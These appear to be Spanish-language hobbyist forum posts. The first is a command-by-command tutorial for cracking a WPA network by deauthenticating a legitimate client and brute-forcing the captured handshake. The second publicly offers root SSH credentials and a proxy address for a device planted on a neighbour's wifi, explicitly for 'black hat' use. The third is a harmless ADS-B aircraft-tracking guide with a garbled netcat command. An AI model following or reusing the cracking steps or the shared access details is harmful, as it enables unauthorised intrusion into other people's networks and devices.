STARKCDG

Que weba, que weba, pero dado a que no estoy haciendo mi servicio social de la universidad pues le dedicare tiempo a hacer mi primer post.. Muchos saben sacar claves wep, osea, quien no? Esas viejas claves en Wired Equivalent Privacy, que ya hasta les sacaron uns distribucion DSL llamada beini para los webones, Hazme el reverendo favor. Otros tantos pocos han investigado y saben sacar o saben los principios basicos del como hacerse de una clave en WPA, no mather, la idea de este post es la de sacarlos de la caja donde viven y piensen afuera de esta y avancen utilizando mas la imaginacion. Algunos saben usar airolib? ya saben las tablas tipo Rainbow tables para probar muchisimas mas claves por segundo de lo que te permite aircrack con un simple diccioonario, que si tienen un procesador dual core y 2 GB lo maximo que obtienen son 1200 K/seg. Bueno, sin tanto choro, vamos al grano....REQUISITOS librerias aircrack-ngbinarios de crunch password generatorun handshake de una clave WPAy chingos de pacienciaPASOSairmon-ng stop wlan0 (detener tu targeta inalambrica, la interfaz puede cambiar "wlan0)ifconfig wlan0 down (dar de baja la targeta para reconfigurarla)macchanger --mac 00:11:22:33:44:55 (cambiar el Media Access Controll por uno mas facil y te agilise los sig. pasos)iwconfig wlan0 mode monitor (cambiar el modo de la targeta a monitor)airodump-ng wlan0 (monitorear las señales WI-FI a tu alcanze)_________________________________________________________________________________________EJEMPLO CH 11 ][ Elapsed: 4 s ][ 2011-11-07 10:34 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 08:76F:60:3C:E8 -78 57 0 0 11 54e WPA PSK TELMEX BSSID STATION PWR Rate Lost Packets Probes 08:76F:60:3C:E8 00:12:34:56:78:90____________________________________________________________________________________________aireplay-ng -9 wlan0 *OPCIONAL* (hacer examen de inyeccion para ver si estas al alcanze y poras desautentificar al cliente)______________________________________________________________________________________airodump-ng -c 11 -w dump --bssid 08:76F:60:3C:E8 wlan0 (estar a la escucha de la red por si cae un handshake)## AHORA HAY QUE DESAUTENTIFICAR UN CLIENTE (USUARIO LEGITIMO Y CONECTADO DE LA RED) PARA OBTENER UN HANDSHAKE, O APRETON DE MANOS DONDE ESTA LA CLAVE QUE DESPUES SE SACA POR METODO DE FUERZA BRUTA.aireplay-ng -0 10 -c 00:12:34:56:78:90 -b 08:76F:60:3C:E8 -e TELMEX wlan0DESPUES DE ESO LES APARACERA UNA RESPUESTA COMO ESTA EN LA VENTANA DE MONITOREO CH 11 ][ Elapsed: 4 s ][ 2011-11-07 10:34 [HANDSHAKE:00:12:34:56:78:90] <--------------OJO, CAPTURARON EL 4-WAY HANDSHAKE! BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 08:76F:60:3C:E8 -78 57 0 0 11 54e WPA PSK TELMEX BSSID STATION PWR Rate Lost Packets Probes 08:76F:60:3C:E8 00:12:34:56:78:90_____________________________________________________________________ya tenemos el handshake con el nombre de dump-01.cap y ahora para romperla tienen dos opciones, usar crunch para que genere contraseñas y hacer pipe directo a aircrack o crear unas tablas con airolib que son un poco mas rapidas, sin embargo necesitaran un buen de espacio libre, minimo unos 100 GB, les recomiendo comprarse un disco duro de 1 TB.empezamos con crunch + aircracksi usan backtrack 5 usen estos pasos, si no solo cambien la ruta donde se encuentran sus binarios de crunchcd /pentest/passwords/crunch./crunch 10 12 01234567890 | aircrack-ng /root/dump-01.cap -e TELMEX -w -#ahora crunch empezara a generar contraseñas con los digitos que pusimos en este caso 0123456789 de diez a doce digitos de largo, pueden agregar letras pero las posibilidades aumentan exponencialmente, y es tardado, y toma un par de dias probar todas esas posibilidades. DIJE QUE NECESITARIAN PASCIENCIA## ahora con la suite airolib, aqui necesitaran minimo 100 GB de espacio en su disco, por que la tabla ocupa un gran espacio. en el anterior no necesitan tener nada de espacio en su disco.touch essid.txt (crear archivo de texto llamado essid.txt)echo TELMEX > essid.txt (escribir en el archivo de texto creado el nombre de la red)cat essid.txt (leer el archivo de texto para confirmar que se escribio)airolib-ng wpa --import essid essid.txt (crear la tabla con el nombre wpa e importar el nombre de la red del archivo de texto que creamos)#ahora muevanse al directorio donde tienen crunch para correrlo./crunch 10 10 0123456789 | airolib-ng /root/wpa --import passwd - #este ultimo paso es para importar las contraseñas que generara crunch las cuales seran en total 100 GIGAS, esto toma algo de tiempo, pero si toman atencion al numero que corre abajo se daran cuenta que crea una gran cantidad de contraseñas probables y muchisimo mas rapido, tengan pasciencia y esperen.airolib-ng /root/wpa --statsairolib-ng /root/wpa --clean allairolib-ng /root/wpa --batchairolib-ng /root/wpa -verify all## ME DIO WEBA EXPLICAR LOS DEMAS PASOS, SOLO HAGANLOS, NO LE HAGAN AL PANCHO, DESPUES DE ESO ESTARA LISTO LA TABLA CON EL NOMBRE DE wpa Y PUEDEN PROCEDER A ROMPER LA CLAVE. aircrack-ng -r /root/wpa dump-01.cap -e TELMEXMUCHA SUERTE, SI TE GUSTO DEJA TU COMENTARIO SI NO YA SABES QUE TAMBIEN, DALE A FAVORITOS, ROLALO EN TU MYSPACE, FACEBOOK, TWITTER, GOOGLE+ "hector leal"jajajajasi necesitan ayuda con cualquier cosa avisenme, estoy en tamaulipas y san luis [email protected] 252 4094

Buenos Dias, hoy vengo con la intencion de dejar libre al publico los parametros para un servidor proxy, ssh y pentesting box para el uso de la comunidad, ya sea para hacer trabajo black hat o simplemente para newbies que quieran dar mess up a las redes a las que esta conectado el servidor. Para conectarse al servidor tienen que usar los parametros del proxy, por que el servidor SSH y Pentesting box estan detras del proxy, pero tiene acceso libre a cualquier red. Usen el coco tantito. got my pwnpi running on my neightsbors wifi, you can connect to it but have to use a proxy, here are the settings... external ip address: 72.190.96.56 proxy port (http): 808 pwnpi ip address: 192.168.199.102 ssh username: root ssh password: shukaku cualquier duda me avisan a [email protected] Gracias

Hola, he visto varios tutoriales de repost de como hacer un radar con una dongle de NooElec. La mayoria de ellos son lamers que respostean lo que hay en la comunidad Norte Americana traduciendolo al Espanol, jamas lo han provado, jamas lo han hecho en realidad, solo repostean. Es triste por que habemos quienes realmente hacemos todo el esfuerzo para traerles este tipo de informacion. Pero en fin, les traigo mi version del radar de Aeronaves (aviones) con la dongle de NooElec, en mi caso es la RTL2832U, la compre por 21.95 usd y me llego en 5 dias, de hecho compre dos por que se me hicieron muy baratas y me puse a experimentar en la oficina. Tengo el ordenador de mi oficina el cual es un Acer Aspire AM3470-UC11P con windows 7 a 64 bits, un procesador AMD Quad-Core A8-3820 APU con una Radeon HD 6550D, 2 Terabytes de disco duro, y 8 gb de RAM DDR3. Mi Portatil es un Dell N5050 con procesador i3 2nd Generation a 2.3 Ghz a 64 bits, 8 Gb de RAM DDR3 y 500 Gb de disco duro corriendo Kali Linux con las actualizaciones al dia. Paso 1- Sencillo, en el ordenador con Kali linux tengo conectada la dongle de NooElec, ya tiene instalado SDR utilities, y corro un simple comando: rtl_adsb | grep netcat -lp 8080 Este comando lo que hace es usar el dongle para escuchar las señales que emiten las aeronaves en formato ADSB (Automatic dependent surveillance-broadcas), lo que en español es ¨Sistemas de vigilancia de navegación aérea¨ y que por cierto no esta encryptado de ninguna forma. Entonces como les decia, lo escucha a traves del dongle que se modula en la frequencia correcta y los datos los transmite via red por el puerto 8080. Les dejo un pantallazo Una ves esto nos pasamos al ordenador con Windows. Paso 2.- En el ordenador con windows, debes descargar un programa que se llama ADSBSCOPE. Lo puedes descargar en la siguiente URL: http://www.sprut.de/electronic/pic/projekte/adsb/adsb_all.zip Corren el programa que cuando lo extran queda en la carpeta /adsb_all/adsb_all/pc_software/adsbscope/26/ Les abrira una pantalla como la que sigue. Despues den click en la siguiente opcion para configurar el servidor de ADSB el cual es la maquina con linux. Configuren la direccion IP que tiene la maquina con kali linux y el puerto que estan ocupando, recuerden que yo estoy usando el 8080 pero ustedes pueden poner el que gusten. Sigan la siguiente opcion para seleccionar el aeropuerto mas cercano a su ciudad, yo puse la ciudad donde estoy que es Dallas, Texas. Ahora viene lo bueno, denle click al boton de START RAW-DATA CLIENT Y en cuanto comienzen a pasar aviones cerca de su area comenzaran a recibir parametros de su ruta, velocidad, latitud y longitud asi como Altitud, la Altitud se maneja en pies. Y varios parametros mas. Espero les haya gustado. Si les gusto, no sean ogetes y dejenme unos puntos o recomienden, agreguen a favoritos y si no tengo un post respecto a lo que andan investigando como quiera preguntenme. Ademas animense a resolver el mensaje cifrado en el post anterior a este. Buen dia. Dejen sus comentarios. STARK